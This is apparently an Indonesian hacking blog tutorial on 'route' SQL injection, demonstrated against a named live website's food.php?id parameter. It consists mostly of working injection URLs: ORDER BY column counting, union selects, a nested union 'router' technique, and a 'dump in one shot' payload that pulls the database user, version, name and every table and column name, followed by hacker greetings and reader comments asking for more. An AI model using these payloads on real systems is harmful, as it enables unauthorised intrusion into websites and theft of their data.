Route sql injection
TUTORIAL ROUTE SQL INJECTION BY VERSAILLES
contoh target:
www.randyfath.com/food.php?id=6
Seperti biyasa nya kita lakukan injeksi pertama kali nya
www.randyfath.com/food.php?id=6'
dan hasil nya
sekarang kita mulai cek satu persatu untuk menemukan dimana letak error nya.
www.randyfath.com/food.php?id=6+ORDER+BY+1--[normal]
www.randyfath.com/food.php?id=6+ORDER+BY+2--[normal]
www.randyfath.com/food.php?id=6+ORDER+BY+3--[normal]
www.randyfath.com/food.php?id=6+ORDER+BY+4--[normal]
www.randyfath.com/food.php?id=6+ORDER+BY+5--[normal]
www.randyfath.com/food.php?id=6+ORDER+BY+6--[normal]
www.randyfath.com/food.php?id=6+ORDER+BY+7--[error]
berarti jumlah kolom ada 6
ok selanjut nya kita langsung menuju union select aja gan
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+1,2,3,4,5,6--
loh hasil nya kok normal gak nujukin angka ajip nya?????
langsung aja kita menggunakan perintah router union yaitu kita order by lg :p
TAPI sebelumnya kita hex dulu tanda kutip untuk menentukan lokasi yg akan dirouter,kebetulan web ini router nya di anga 1... tidak semua web sama gan>>> simak lagi
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+1--',2,3,4,5,6--[normal]
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+2--',2,3,4,5,6--[normal]
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+3--',2,3,4,5,6--[normal]
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+4--',2,3,4,5,6--[normal]
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+5--',2,3,4,5,6--[normal]
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+6--',2,3,4,5,6--[normal]
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+ORDER+BY+7--',2,3,4,5,6--[error]
TERNYATA sama terdapat 6 kolom lg. ok gan sekarang kita lanjut kan lg.....
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+AND+0+UNION+SELECT+1,2,3,4,5,6--',2,3,4,5,6--
dan tara
ok sekarang kita masukan dios nya gan
www.randyfath.com/food.php?id=6+AND+0+UNION+SELECT+'1+AND+0+UNION+SELECT+1,2,concat('KAKATOJI',0x3c62723e,USER(),0x3c62723e,VERSION(),0x3c62723e,DATABASE(),0x3c62723e,(select (@x)from(select(@x:=0x00), (select(0)from (information_schema.columns)whe re(table_schema=database())and (0x00)in(@x:=concat +(@x,0x3c62723e,table_name,0x20 3a3a20,column_name))))x)),4,5,6--',2,3,4,5,6--
Greets:
- VERRY DARMAWAN
- ENGGAR
- LAMMER ELLITE
- ROMMY MAULANA
- CHEL PY
- REYVANDO ALIEF P
K Tutorial cara Sql Thunder donk
Saya pengen bisa thunder
wah ada yg coment ternyata